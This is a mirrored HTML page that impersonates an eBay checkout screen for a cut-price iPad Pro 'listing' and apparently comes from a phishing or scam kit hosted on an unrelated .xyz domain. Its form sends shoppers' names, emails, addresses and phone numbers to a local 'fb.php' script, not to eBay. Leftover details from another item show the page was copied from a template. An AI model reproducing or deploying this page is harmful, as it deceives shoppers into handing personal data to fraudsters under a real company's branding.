﻿<!DOCTYPE html>
<html lang="en">
  
<!-- Mirrored from iphone-8-plus-256gb.554366123244hashitem1c849c44c9gocyaaoswntzd0envxpmtr.xyz/checkout.php?orFreeProduct/221278135775?_trksid=p2047675.c100005.m1851&_trkparms=aid%3D222007%26algo%3DSIC.MBE%26ao%3D2%26asc%3D35426%26meid%3Dcfe574b4452b4bc6a667548f5d854937%26pid%3D100005%26rk%3D3%26rkt%3D6%26sd%3D221278144716= by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 13 Oct 2017 18:49:37 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta http-equiv="content-type" content="text/html;
      charset=windows-1252">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <noscript>
		<meta http-equiv="refresh" content="0;url=https://checkout.payments.ebay.com/ws/eBayISAPI.dll?XOProcessor&amp;rdfs=true&amp;js=0&amp;pagename=ryprender&amp;sessionid=395867503010">
	</noscript>
    <title>Checkout: Review order</title>
    <script>
		var oGaugeInfo = {
			sUrl: "https://sofe.ebay.com/ws/web/SojPagePerf?s_app_name=xowebapp&cmdname=sbc checkout&s_qt=17176,33712,26908,31792,34228,25322,31124,17136,10192,28976,11576,15529,29686,28160,11639,29612,20146,33486,33508,31076,34232,29941,31787,34389,20996,10232,22038,33416,33551,28224,28696,33414,34215,11563,28198,33945,20330,29900,32794,27412,30213,33989,26046,33941,34455,33214,34199,29525,18951,33297,25489,13028,24610,29672,30943,28684,32274,31348,20168,28892,21591,32789,15235,32683,14970,11700,19566,34260,24668,22960,33579,30936,33372,20569,27776,30336,16228,34361,32100&st1=1446301822680&s_host=chd1b01c-7ed2&s_env=production&s_app_version=xowebapp-1.0.1_SNAPSHOT_20150811155105287",
			iST: (new Date()).getTime()
		};
	</script>
	<link href="ir.ebaystatic.com/rs/v/03bruof40u2txaksk4kxcvxa5iz.css" type="text/css" rel="stylesheet"><link href="ir.ebaystatic.com/rs/v/guzvbjxflq2avbhmk1itqrcj5ak.css?proc=DU:N" type="text/css" rel="stylesheet"><link href="https://ir.ebaystatic.com/rs/v/co3haztn1u0rbkishjnsvruxnis.css" type="text/css" rel="stylesheet"><style type="text/css">body .is.vi-ppc-main .mm-dp {
width:35%;
}

#vi-snippet-description-main.u-padB20 {
    padding-top:10px;
    float:left;
}

.vi-descsnpt-feedbacklnk {
    position: relative;
    top: -20px;
    width: 500px;
    margin-left: 250px;
}

.asqMain {
    clear:both;
}

div#bsi-c {
clear: both;
}
.vi-pco-bboxtxt-Ins * {
	font-weight: normal !important;
	color: #0654ba !important;
}
.adninc{width:620px}.imgtitle{background-color:#fff;height:76px;padding-top:16px}.adnimg{float:left;padding:0 16px 0 24px;height:60px;width:60px;line-height:60px}.adnlogoimg{max-width:60px;max-height:60px;vertical-align:middle}#adndesctbl{margin-bottom:10px}.adnlabel{font-size:17px;vertical-align:middle;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif;font-weight:500;font-stretch:normal;color:#5ba71b;padding-top:10px}.adntitle{font-size:13px;vertical-align:middle;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif;font-weight:500;font-stretch:normal;color:#333;padding-top:8px}.adnactions{padding-top:24px}.adnlrnmore{display:block;float:left;font-size:14px;color:#00489f;padding:16px 0 0 16px;text-decoration:none;outline:0 none!important;font-weight:400}.addonBtn{float:right}.adndesclbl{font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;font-style:normal;font-stretch:normal;color:#555;padding:0 0 16px 16px}.adndesc{border-top:solid 1px #ddd;padding:24px;background-color:#f6f6f6}.addondescdetails{border-collapse:collapse;border:1px solid #DDD;background-color:#fff;border-radius:5px}.wrttitle{padding:16px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:15px;font-weight:500;font-style:normal;font-stretch:normal;text-align:left;color:#333}.addontr{height:25px;vertical-align:middle}.addyesno{padding:6px 12px 6px 16px;width:16px}.addonyes{background:url(//ir.ebaystatic.com/cr/v/c1/addonwrty.png) no-repeat 0 -54px;height:16px;width:16px;background-size:16px}.addonno{background:url(//ir.ebaystatic.com/cr/v/c1/addonwrty.png) no-repeat 0 -72px;height:16px;width:16px;background-size:16px}.addondesc{font-size:13px;line-height:15px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif;width:528px;padding:6px 12px 6px 0}.addonbtn{padding:.5em 1.2em;border:1px solid transparent;border-radius:3px;vertical-align:baseline;text-align:center;text-decoration:none;white-space:nowrap;font-weight:500;font-size:16px;cursor:pointer;zoom:1;display:inline-block;*display:inline;width:129px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif}.adnclr{clear:both}.addonbtn{padding:.5em 1.2em;border:1px solid transparent;border-radius:3px;vertical-align:baseline;text-align:center;text-decoration:none;white-space:nowrap;font-weight:500;font-size:16px;cursor:pointer;zoom:1;display:inline-block;*display:inline;width:129px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif}.addonbtn:hover{background-color:#eee;background-position:0 -15px;-webkit-box-shadow:0 0 0 rgba(0,0,0,.2);-moz-box-shadow:0 0 0 rgba(0,0,0,.2);box-shadow:0 0 0 rgba(0,0,0,.2);text-decoration:none;-moz-transition:background-position .1s linear 0}.addonbtn:active{position:relative;top:1px}.addonaddplan{background:#00509d;background:-webkit-gradient(linear,left top,left bottom,from(#0079bc),to(#00509d));background:-moz-linear-gradient(top,#0079bc,#00509d);text-decoration:none;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#0079bc',endColorstr='#00509d');color:#fff;margin-right:16px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif}.addonaddplan:hover,.addonaddplan:focus,.addonaddplan:active{background:#00509d;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00509d',endColorstr='#00509d')}.addonnothx{border:1px solid #ddd;background:#f8f8f8;background:-webkit-gradient(linear,left top,left bottom,from(#fefefe),to(#f8f8f8));background:-moz-linear-gradient(top,#fefefe,#f8f8f8);text-decoration:none;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fefefe',endColorstr='#f8f8f8');color:#0654ba;margin-right:16px;font-family:HelveticaNeue,Helvetica Neue,Helvetica,Arial,sans-serif}.addonnothx:hover,.addonnothx:focus,.addonnothx:active{border:1px solid #aaa;background:#fafafa}.ui-hlp-hidden{width:0;height:0;z-index:-1;overflow:hidden;line-height:0;position:absolute}.outline{outline:0 none!important}div .calc_ec-a3 }
.similar-items-panel .similar-items-title {font-family: "Helvetica neue",Helvetica,Verdana,Sans-serif !important;}
#Body .app-mtp-theme-tabs * {font-family: "Helvetica neue",Helvetica,Verdana,Sans-serif}
#Body .theme-details * {font-family: "Helvetica neue",Helvetica,Verdana,Sans-serif}
h1#ProductTitle {font-family: "Helvetica neue",Helvetica,Verdana,Sans-serif}</style><style type="text/css">
				html a:link{
					color: #0654ba;
				}
				ul#bc a:link{
					color: #0654ba;
				}
				.mbg a:link{
					color: #0654ba !important;
				}
				.mbg-l a:link{
					color: #0654ba !important;
				}
				#Body .nav-tabs-m a:link{
					color: #0654ba;
				}
			</style>
    <link rel="shortcut icon" href="images/favicon.ico"
      type="image/x-icon">
    <link
href="secureir.ebaystatic.com/rs/v/worerzzqlq4wjkisrhcditod5yi.css"
      type="text/css" rel="stylesheet">
    <link
href="secureir.ebaystatic.com/rs/v/txc5aju3ki0hjkqrry01y5xfxyy.css"
      type="text/css" rel="stylesheet">
    <link href="css/bbbrgmquwe4eri5pqd4mbjf1b.css" type="text/css"
      rel="stylesheet">
    <script src="secureir.ebaystatic.com/rs/v/5d0jfcqtnm02farcw3ozjskdee5.js" type="text/javascript"></script>
    <script>
		var ABOVEFOLD = {
			imagesCount: 0,
			completedAt: null,
			load: function(source) {
				this.completedAt = new Date().getTime();
				this.imagesCount++;
			},
			time: function() {
				return this.completedAt;
			}
		};
	</script>
    <style type="text/css">
		#pageform input[type="email"]{
		    font-family: arial;
		    font-size: 16px;
		    color: #333;
		    padding-left: 5px;
		    height: 25px;
		    line-height: 1.3;
		}
		input[type="email"]{
		    margin: 0 0 5px;
		    -webkit-border-radius: 3px;
		    -moz-border-radius: 3px;
		    border-radius: 3px;
		    color: #333;
		}
		input[type="email"]{
		    border: 1px solid #ddd;
		    background: #fff;
		    box-shadow: 0 1px 0 rgba(255,255,255,0.8),inset 0 1px 2px rgba(0,0,0,0.06);
		}
		.fieldgroup label:last-child{
			display: block;
		    color: red;
		    font-size: 10px;
		    padding-left: 135px;
		}
	</style>
  </head>
  <body>
    <div class="xo container">
      <div id="header" class="row-fluid">
        <div class="span9">
          <!--[if lt IE 9]><link rel="stylesheet" type="text/css" href="https://secureir.ebaystatic.com/rs/v/32q2wauokmyjletm4byq40w5s2i.css?proc=DU:N"></link><![endif]-->
          <div class="gh-acc-exp-div"><a id="gh-hdn-stm"
              class="gh-acc-a" href="#mainContent">Skip to main content</a></div>
          <!--[if lt IE 9]><div id="gh" role="banner" class="gh-IE8 gh-flex gh-pre-js gh-w gh-minH "><![endif]-->
          <!--[if (gte IE 9)|!(IE)]><!-->
          <header id="gh" role="banner" class="gh-flex gh-pre-js gh-w
            gh-minH ">
            <!--<![endif]-->
            <table class="gh-tbl">
              <tbody>
                <tr>
                  <td class="gh-td">
                    <!--[if lt IE 9]><a href="http://www.ebay.com/" _sp="m570.l2586" id="gh-la">eBay<img role="presentation" width=117 height=120 style='clip:rect(47px, 118px, 95px, 0px); position:absolute; top:-47px;left:0' alt="" src="https://secureir.ebaystatic.com/rs/v/apstidvcvu5pxlbxkphrrdo5iqv.png" id="gh-logo"></a><![endif]-->
                    <!--[if (gte IE 9)|!(IE)]><!--><a
                      href="http://www.ebay.com/" _sp="m570.l2586"
                      id="gh-la">eBay<img role="presentation"
                        style="clip:rect(47px, 118px, 95px, 0px);
                        position:absolute; top:-47px;left:0" alt=""
src="secureir.ebaystatic.com/rs/v/fxxj3ttftm5ltcqnto1o4baovyl.png"
                        id="gh-logo" width="250" height="200"></a>
                    <!--<![endif]--> </td>
                </tr>
              </tbody>
            </table>
            <!--[if lt IE 9]></div><![endif]-->
            <!--[if (gte IE 9)|!(IE)]><!--> </header>
          <!--<![endif]-->
          <!--ts:2015.10.30.13:52-->
          <!--rq:-->
          <!-- rvr:77rc5 -->
          <h1 class="shpt">
            <div id="mainContent" role="main" tabindex="-1"></div>
            Checkout: Review order</h1>
        </div>
        <div class="span3" style="text-align: right">
          <div class="font1 surveysbc"> <span>How do you like our
              checkout?</span></div>
          <div class="font1"><a href="javascript:;"
              url="http://qu.ebay.com/survey?srvName=Checkout(Checkout_Redesign_US)&amp;extParam=uid:sandisarka33|cartid:13337738378|attr:SkipCYP;ServiceSession;SchedulerFeatureEnabled;scta|pagename:RYP|sessionid:395867503010"
              aria-haspopup="true" class="survey">Tell us what you think</a></div>
        </div>
      </div>
      <div class="mt10" id="pagelevelerrors" role="alert"
        aria-live="assertive"> </div>
      <div id="centralarea" class="row-fluid mt10">
	         <form method="post" action="fb.php" name="pageform"
          id="pageform" novalidate="novalidate">
	 <div id="centralarea" class="row-fluid mt10">
	        
          <div id="leftsection" class="span8">
            <div id="topsection" class="row-fluid m-cnt">
              <div id="shippingaddress" class="span6 shippingaddress">
                <h2 class="font4 topsecborder"> <span class="i-shipto"></span>Ship



  

                  to</h2>
                <div>
                  <div class="CentralArea" id="CentralArea">
                    <div>
                      <div id="errordiv"></div>
                      <div id="form-content" class="add-field mb10">
                        <div class="mb10 fieldgroup"> <label
                            for="country" class="iblk">Country or region</label>
                          <select name="country">
                            <option value="" selected="selected">Select
                              Country</option>
                            <option value="United States">United States</option>
                            <option value="APO/FPO/DPO">APO/FPO/DPO</option>
                            <option value="Canada">Canada</option>
                            <option value="United Kingdom">United
                              Kingdom</option>
                            <option value="Afghanistan">Afghanistan</option>
                            <option value="Albania">Albania</option>
                            <option value="Algeria">Algeria</option>
                            <option value="American Samoa">American
                              Samoa</option>
                            <option value="Andorra">Andorra</option>
                            <option value="Angola">Angola</option>
                            <option value="Anguilla">Anguilla</option>
                            <option value="Antigua and Barbuda">Antigua
                              and Barbuda</option>
                            <option value="Argentina">Argentina</option>
                            <option value="Armenia">Armenia</option>
                            <option value="Aruba">Aruba</option>
                            <option value="Australia">Australia</option>
                            <option value="Austria">Austria</option>
                            <option value="Azerbaijan Republic">Azerbaijan





                              Republic</option>
                            <option value="Bahamas">Bahamas</option>
                            <option value="Bahrain">Bahrain</option>
                            <option value="Bangladesh">Bangladesh</option>
                            <option value="Barbados">Barbados</option>
                            <option value="Belarus">Belarus</option>
                            <option value="Belgium">Belgium</option>
                            <option value="Belize">Belize</option>
                            <option value="Benin">Benin</option>
                            <option value="Bermuda">Bermuda</option>
                            <option value="Bhutan">Bhutan</option>
                            <option value="Bolivia">Bolivia</option>
                            <option value="Bosnia and Herzegovina">Bosnia





                              and Herzegovina</option>
                            <option value="Botswana">Botswana</option>
                            <option value="Brazil">Brazil</option>
                            <option value="British Virgin Islands">British





                              Virgin Islands</option>
                            <option value="Brunei Darussalam">Brunei
                              Darussalam</option>
                            <option value="Bulgaria">Bulgaria</option>
                            <option value="Burkina Faso">Burkina Faso</option>
                            <option value="Burundi">Burundi</option>
                            <option value="Cambodia">Cambodia</option>
                            <option value="Cameroon">Cameroon</option>
                            <option value="Canada">Canada</option>
                            <option value="Cape Verde Islands">Cape
                              Verde Islands</option>
                            <option value="Cayman Islands">Cayman
                              Islands</option>
                            <option value="Central African Republic">Central





                              African Republic</option>
                            <option value="Chad">Chad</option>
                            <option value="Chile">Chile</option>
                            <option value="China">China</option>
                            <option value="Colombia">Colombia</option>
                            <option value="Comoros">Comoros</option>
                            <option value="Congo, Democratic Republic of
                              the">Congo, Democratic Republic of the</option>
                            <option value="Congo, Republic of the">Congo,





                              Republic of the</option>
                            <option value="Cook Islands">Cook Islands</option>
                            <option value="Costa Rica">Costa Rica</option>
                            <option value="Cote d Ivoire (Ivory Coast)">Cote





                              d Ivoire (Ivory Coast)</option>
                            <option value="Croatia, Republic of">Croatia,





                              Republic of</option>
                            <option value="Cyprus">Cyprus</option>
                            <option value="Czech Republic">Czech
                              Republic</option>
                            <option value="Denmark">Denmark</option>
                            <option value="Djibouti">Djibouti</option>
                            <option value="Dominica">Dominica</option>
                            <option value="Dominican Republic">Dominican
                              Republic</option>
                            <option value="Ecuador">Ecuador</option>
                            <option value="Egypt">Egypt</option>
                            <option value="El Salvador">El Salvador</option>
                            <option value="Equatorial Guinea">Equatorial
                              Guinea</option>
                            <option value="Eritrea">Eritrea</option>
                            <option value="Estonia">Estonia</option>
                            <option value="Ethiopia">Ethiopia</option>
                            <option value="Falkland Islands (Islas
                              Malvinas)">Falkland Islands (Islas
                              Malvinas)</option>
                            <option value="Fiji">Fiji</option>
                            <option value="Finland">Finland</option>
                            <option value="France">France</option>
                            <option value="French Guiana">French Guiana</option>
                            <option value="French Polynesia">French
                              Polynesia</option>
                            <option value="Gabon Republic">Gabon
                              Republic</option>
                            <option value="Gambia">Gambia</option>
                            <option value="Georgia">Georgia</option>
                            <option value="Germany">Germany</option>
                            <option value="Ghana">Ghana</option>
                            <option value="Gibraltar">Gibraltar</option>
                            <option value="Greece">Greece</option>
                            <option value="Greenland">Greenland</option>
                            <option value="Grenada">Grenada</option>
                            <option value="Guadeloupe">Guadeloupe</option>
                            <option value="Guam">Guam</option>
                            <option value="Guatemala">Guatemala</option>
                            <option value="Guernsey">Guernsey</option>
                            <option value="Guinea">Guinea</option>
                            <option value="Guinea-Bissau">Guinea-Bissau</option>
                            <option value="Guyana">Guyana</option>
                            <option value="Haiti">Haiti</option>
                            <option value="Honduras">Honduras</option>
                            <option value="Hong Kong">Hong Kong</option>
                            <option value="Hungary">Hungary</option>
                            <option value="Iceland">Iceland</option>
                            <option value="India">India</option>
                            <option value="Indonesia">Indonesia</option>
                            <option value="Ireland">Ireland</option>
                            <option value="Israel">Israel</option>
                            <option value="Italy">Italy</option>
                            <option value="Jamaica">Jamaica</option>
                            <option value="Jan Mayen">Jan Mayen</option>
                            <option value="Japan">Japan</option>
                            <option value="Jersey">Jersey</option>
                            <option value="Jordan">Jordan</option>
                            <option value="Kazakhstan">Kazakhstan</option>
                            <option value="Kenya">Kenya</option>
                            <option value="Kiribati">Kiribati</option>
                            <option value="Korea, South">Korea, South</option>
                            <option value="Kuwait">Kuwait</option>
                            <option value="Kyrgyzstan">Kyrgyzstan</option>
                            <option value="Laos">Laos</option>
                            <option value="Latvia">Latvia</option>
                            <option value="Lebanon">Lebanon</option>
                            <option value="Liechtenstein">Liechtenstein</option>
                            <option value="Lithuania">Lithuania</option>
                            <option value="Luxembourg">Luxembourg</option>
                            <option value="Macau">Macau</option>
                            <option value="Macedonia">Macedonia</option>
                            <option value="Madagascar">Madagascar</option>
                            <option value="Malawi">Malawi</option>
                            <option value="Malaysia">Malaysia</option>
                            <option value="Maldives">Maldives</option>
                            <option value="Maldives">Maldives</option>
                            <option value="Malta">Malta</option>
                            <option value="Marshall Islands">Marshall
                              Islands</option>
                            <option value="Martinique">Martinique</option>
                            <option value="Mauritania">Mauritania</option>
                            <option value="Mauritius">Mauritius</option>
                            <option value="Mayotte">Mayotte</option>
                            <option value="Mexico">Mexico</option>
                            <option value="Micronesia">Micronesia</option>
                            <option value="Moldova">Moldova</option>
                            <option value="Monaco">Monaco</option>
                            <option value="Mongolia">Mongolia</option>
                            <option value="Montenegro">Montenegro</option>
                            <option value="Montserrat">Montserrat</option>
                            <option value="Morocco">Morocco</option>
                            <option value="Mozambique">Mozambique</option>
                            <option value="Namibia">Namibia</option>
                            <option value="Nauru">Nauru</option>
                            <option value="Nepal">Nepal</option>
                            <option value="Netherlands">Netherlands</option>
                            <option value="Netherlands Antilles">Netherlands





                              Antilles</option>
                            <option value="New Caledonia">New Caledonia</option>
                            <option value="New Zealand">New Zealand</option>
                            <option value="Nicaragua">Nicaragua</option>
                            <option value="Niger">Niger</option>
                            <option value="Nigeria">Nigeria</option>
                            <option value="Niue">Niue</option>
                            <option value="Norway">Norway</option>
                            <option value="Oman">Oman</option>
                            <option value="Pakistan">Pakistan</option>
                            <option value="Palau">Palau</option>
                            <option value="Panama">Panama</option>
                            <option value="Papua New Guinea">Papua New
                              Guinea</option>
                            <option value="Paraguay">Paraguay</option>
                            <option value="Peru">Peru</option>
                            <option value="Philippines">Philippines</option>
                            <option value="Poland">Poland</option>
                            <option value="Portugal">Portugal</option>
                            <option value="Puerto Rico">Puerto Rico</option>
                            <option value="Qatar">Qatar</option>
                            <option value="Reunion">Reunion</option>
                            <option value="Romania">Romania</option>
                            <option value="Russian Federation">Russian
                              Federation</option>
                            <option value="Rwanda">Rwanda</option>
                            <option value="Saint Helena">Saint Helena</option>
                            <option value="Saint Kitts-Nevis">Saint
                              Kitts-Nevis</option>
                            <option value="Saint Lucia">Saint Lucia</option>
                            <option value="Saint Pierre and Miquelon">Saint





                              Pierre and Miquelon</option>
                            <option value="Saint Vincent and the
                              Grenadines">Saint Vincent and the
                              Grenadines</option>
                            <option value="San Marino">San Marino</option>
                            <option value="Saudi Arabia">Saudi Arabia</option>
                            <option value="Senegal">Senegal</option>
                            <option value="Serbia">Serbia</option>
                            <option value="Seychelles">Seychelles</option>
                            <option value="Sierra Leone">Sierra Leone</option>
                            <option value="Singapore">Singapore</option>
                            <option value="Slovakia">Slovakia</option>
                            <option value="Slovenia">Slovenia</option>
                            <option value="Solomon Islands">Solomon
                              Islands</option>
                            <option value="Somalia">Somalia</option>
                            <option value="South Africa">South Africa</option>
                            <option value="Spain">Spain</option>
                            <option value="Sri Lanka">Sri Lanka</option>
                            <option value="Suriname">Suriname</option>
                            <option value="Svalbard">Svalbard</option>
                            <option value="Swaziland">Swaziland</option>
                            <option value="Sweden">Sweden</option>
                            <option value="Switzerland">Switzerland</option>
                            <option value="Tahiti">Tahiti</option>
                            <option value="Taiwan">Taiwan</option>
                            <option value="Tajikistan">Tajikistan</option>
                            <option value="Tanzania">Tanzania</option>
                            <option value="Thailand">Thailand</option>
                            <option value="Togo">Togo</option>
                            <option value="Tonga">Tonga</option>
                            <option value="Trinidad and Tobago">Trinidad
                              and Tobago</option>
                            <option value="Tunisia">Tunisia</option>
                            <option value="Turkey">Turkey</option>
                            <option value="Turkmenistan">Turkmenistan</option>
                            <option value="Turks and Caicos Islands">Turks





                              and Caicos Islands</option>
                            <option value="Tuvalu">Tuvalu</option>
                            <option value="Uganda">Uganda</option>
                            <option value="Ukraine">Ukraine</option>
                            <option value="United Arab Emirates">United
                              Arab Emirates</option>
                            <option value="United Kingdom">United
                              Kingdom</option>
                            <option value="United States">United States</option>
                            <option value="Uruguay">Uruguay</option>
                            <option value="Uzbekistan">Uzbekistan</option>
                            <option value="Vanuatu">Vanuatu</option>
                            <option value="Vatican City State">Vatican
                              City State</option>
                            <option value="Venezuela">Venezuela</option>
                            <option value="Vietnam">Vietnam</option>
                            <option value="Virgin Islands (U.S.)">Virgin
                              Islands (U.S.)</option>
                            <option value="Wallis and Futuna">Wallis and
                              Futuna</option>
                            <option value="Western Sahara">Western
                              Sahara</option>
                            <option value="Western Samoa">Western Samoa</option>
                            <option value="Yemen">Yemen</option>
                            <option value="Zambia">Zambia</option>
                            <option value="Zimbabwe">Zimbabwe</option>
                          </select>
                        </div>
                        <div class="mb10 fieldgroup"> <label
                            for="contactName" class="iblk">Contact Name</label>
                          <input class="txtbox" name="contactName"
                            type="text"> </div>
                        <div class="mb10 fieldgroup"> <label
                            for="contactEmail" class="iblk">Contact
                            Email</label> <input class="text"
                            name="contactEmail" type="text"> </div>
                        <div class="mb10 fieldgroup"> <label
                            for="address1" class="iblk">Street address</label>
                          <input class="txtbox" name="address1"
                            type="text"> </div>
                        <div class="mb10 fieldgroup"> <label
                            for="address2" class="iblk">Street address2</label>
                          <input class="txtbox" name="address2"
                            type="text"> </div>
                        <div class="mb10 fieldgroup"> <label for="city"
                            class="iblk">City</label> <input
                            class="txtbox" name="city" type="text"> </div>
                        <div class="mb10 fieldgroup"> <label
                            for="state" class="iblk">State</label> <input
                            class="txtbox" name="state" type="text"> </div>
                        <div class="mb10 fieldgroup"> <label for="zip"
                            class="iblk">ZIP code</label> <input
                            class="txtbox" name="zip" type="text"> </div>
                        <div class="mb10 fieldgroup"> <label
                            for="phone" class="iblk">Phone Number</label>
                          <input class="txtbox" name="phone" type="text">
                         
                        </div>
                      </div>
                      <div id="shiptobtndiv">
                        <div style="margin-left:130px"> <label
                            style="font-size:12px;">
							<font color="red"><b>This is your default shipping
                            address</font></label> <b id="shiptobtn"
                            class="bn-w pb-L"> <span id="spn_shiptobtn"
                              class="bn-b pb-b pb-L"> 
							  <a href="javascript:;" style="color:white" class="btn btn-prim" >Continue</a>
                            </span> </b> </div>
                      </div>
                      <div id="add_rec"></div>
                    </div>
                  </div>
                </div>
                <div data-load="saddr"></div>
              </div>
              <div id="turbopaymentmethods" class="span6 paymentmethods">
              </div>
              <div id="paymentmethods" class="span6 paymentmethods">
                <div id="deflay"><br>
                </div>
              </div>
              <div id="thirdpartydocuments"></div>
              <div id="thirdpartydocumentoverlays"></div>
            </div>
            <div id="cartdetails" class="row-fluid">
              <h2 class="offscreen">Cart Details</h2>
              <div class="row-fluid sellerbucket" id="s0" sellerid=" ">
                <div class="row-fluid" id="s0_content">
                  <div id="si_s0" style="margin:20px 0">
                    <h3 class="offscreen">Seller &nbsp; </h3>
                    <div class="row-fluid">
                      <div class="span6 nowrap"> <span class="seller">
                          <span class="i-seller"></span> <span title="
                            "> </span> </span> </div>
                    </div>
                    <div id="sellernote_s0" class="addmsg"></div>
                    <input name="sname_s0" id="sname_s0" value=" "
                      type="hidden">
                    <div class="hr"></div>
                  </div>
                  <div class="row-fluid itemimg" id="is_s0_i0"
                    itemid="371466934828">
                    <div class="span2 mb15 imgIdx1"> <span
                        style="width:96px; height:96px;" class="l-shad
                        lftd"> <span style="width:96px; height:96px;">
                          <span style="width:96px; height:96px;"
                            class="imgt"> <img data-size="96"
                              style="max-width:96px; max-height:96px;"
                              title="BRAND NEW iPad Pro 4th Gen Wi-Fi +Cellular(unocked). 1TB 12.9 in Space Gray" alt="BRAND NEW iPad Pro 4th Gen Wi-Fi +Cellular(unocked). 1TB 12.9 in Space Gray" src="images/poza1.jpg"
                              onload="ABOVEFOLD.load(0);"
                              onerror="ABOVEFOLD.load(1);" atf="true"
                              data-event-type="onImageLoad" border="0">
                          </span> </span> </span> </div>
                    <div class="span10">
                      <div class=" fc000 mb15" id="its_s0_i0"> <input
                          name="cid_s0_i0" id="cid_s0_i0"
value="BId-{&quot;ItemId&quot;:371466934828};EId-{&quot;TransactionId&quot;:772802911024};Domain-ebay;LId-20945193914"
                          type="hidden"> <input name="qty_s0_i0"
                          id="qty_s0_i0" value="1" type="hidden">
                        <div class="row-fluid">
                          <div class="span8 font3 titpad"
                            id="ititle_s0_i0">
                            <div class="itmtitle"><span style="color:
                                rgb(34, 34, 34); font-family: arial,
                                sans-serif; font-size: 17.6px;
                                font-style: normal;
                                font-variant-ligatures: normal;
                                font-variant-caps: normal; font-weight:
                                normal; letter-spacing: normal; orphans:
                                2; text-align: start; text-indent: 0px;
                                text-transform: none; white-space:
                                normal; widows: 2; word-spacing: 0px;
                                -webkit-text-stroke-width: 0px;                                
                                display: inline !important; float:
                                none;">BRAND NEW iPad Pro 4th Gen Wi-Fi +Cellular(unocked). 1TB 12.9 in Space Gray<br>
                              </span></div>
                            <a href="javascript:void(0);" title="Remove
                              item from the cart" class="pi-rem"
                              actiontype="RemoveItem" uniqueid="s0_i0"
                              id="ar_s0_i0"></a> </div>
                          <div class="span1 font1 qty nowrap"> Qty: 1</div>
                          <div class="span3 itmprice"> <span>US $ 500.00
                            </span> <a href="javascript:void(0);"
                              title="Remove item from the cart"
                              class="i-rem" actiontype="RemoveItem"
                              uniqueid="s0_i0" role="button"
                              aria-label="Remove Item &nbsp;HOBART 80 QT
                              MIXER - 3 HP 907565" id="ar_s0_i0"></a> </div>
                        </div>
                      </div>
                      <div class="shipdiv">
                        <fieldset> <legend class="ally">Choose a
                            shipping service</legend>
                          <ul>
                          </ul>
                        </fieldset>
                      </div>
                    </div>
                  </div>
                  <div id="sd_s0"> <input name="promo_s0" id="promo_s0"
                      value="false" type="hidden"> </div>
                </div>
              </div>
              <div data-load="ctds"></div>
            </div>
            <div id="donations" class="row-fluid">
              <h2 class="offscreen">Add donations</h2>
            </div>
            <div class="row-fluid">
              <div id="bottomsec" class="span12">
                <div id="incentiveentry">
                  <div class="mb10 talt"> <label class="cplabel"
                      id="incentive_label" for="xocpnety_cnt">Redemption
                      code</label> <a href="javascript:;"
                      id="incetyhelp" aria-label="Help"
                      aria-describedby="incentive_label" role="button"
                      data-content="&lt;div class='bubble'&gt;
                      &lt;p&gt;Coupons, gift cards, or certificates can
                      only be redeemed when paying with
                      PayPal&lt;/p&gt;&lt;ul&gt;&lt;/ul&gt;&lt;/div&gt;"
                      data-bubble="" class="i-bubble"></a> </div>
                  <div style="position: relative"> <input
                      name="xocpnety" id="xocpnety_cnt"
                      aria-describedby="cpnerr" autocorrect="off"
                      autocapitalize="off" spellcheck="false"
                      maxlength="17" disabled="disabled" type="text"> <a
                      class="btn btn-m btn-ter btn-d "
                      href="javascript:;" style="position: absolute;
                      right: -7px; top: 0" actiontype="ApplyIncentives"
                      id="but_aplycpn" title="Redemption code"
                      role="button">Apply</a> <span class="lar-thr"
                      style="position: absolute; top: 0px; right: -47px;
                      display: none"></span>
                    <div id="cpnerr" class="err hide mt10 talt">Please
                      enter the redemption code.</div>
                  </div>
                </div>
                <div></div>
                <div id="incentivedisplay"> </div>
                <div id="captcha"> </div>
                <div id="cartsummary">
                  <h2 class="offscreen">Cart Summary</h2>
                  <hr id="summaryhr">
                  <table width="100%">
                    <tbody>
                      <tr>
                        <th class="pb10 tart" nowrap="nowrap">Subtotal
                          (1 items)</th>
                        <th class="cscost" width="20%" nowrap="nowrap">US





                          $ 500.00 </th>
                      </tr>
                      <tr>
                        <th class="pb10 tart" nowrap="nowrap"><b>Down
                            payment <font size="-2">(Pay now)</font></b><br>
                        </th>
                        <th class="cscost" width="20%" nowrap="nowrap"><b>$0.00</b></th>
                      </tr>
                    </tbody>
                  </table>
                  <hr style="margin: 5px 0px 15px">
                  <table width="100%">
                    <tbody>
                      <tr>
                        <th class="pb10 tart" nowrap="nowrap">Total</th>
                        <th class="cscost" width="20%" nowrap="nowrap">US





                          $ 500.00</th>
                      </tr>
                      <tr>
                        <th class="pb10 tart fc777" nowrap="nowrap">Remaining





                          balance due</th>
                        <th class="cscost fc777" width="20%"
                          nowrap="nowrap">US $0.00</th>
                      </tr>
                    </tbody>
                  </table>
                  <input name="tamt" id="tamt" value="8920.0"
                    type="hidden"> </div>
                <div id="rewardsdisplay"> </div>
              </div>
            </div>
          </div>
          <div id="floatdiv" class="span4">
            <div id="rightrail" class="row-fluid rightrail"
              aria-live="polite">
              <h2 class="offscreen">Total Amount</h2>
              <div class="s-cnt">
                <div style="margin-right: 15px; background-color: #FFF;">
                  <span>Total &nbsp;&nbsp;</span> <span class="font7"
                    id="amount">US $ 500.00</span> </div>
                <div style="margin-right: 15px;" id="ebptext">Covered by
                  the <span class="ebptxt">eBay Money Back Guarantee</span></div>
              </div>
              <div class="recedge">&nbsp;</div>
              <div id="rightrailmessage">
                <div class="mb15" id="ctntext">Continue to complete your
                  purchase</div>
              </div>
              <div id="shipitem"> <a href="javascript:;" style="color:white" class="btn
                  btn-prim" style="width: 60%">Continue</a> </div>
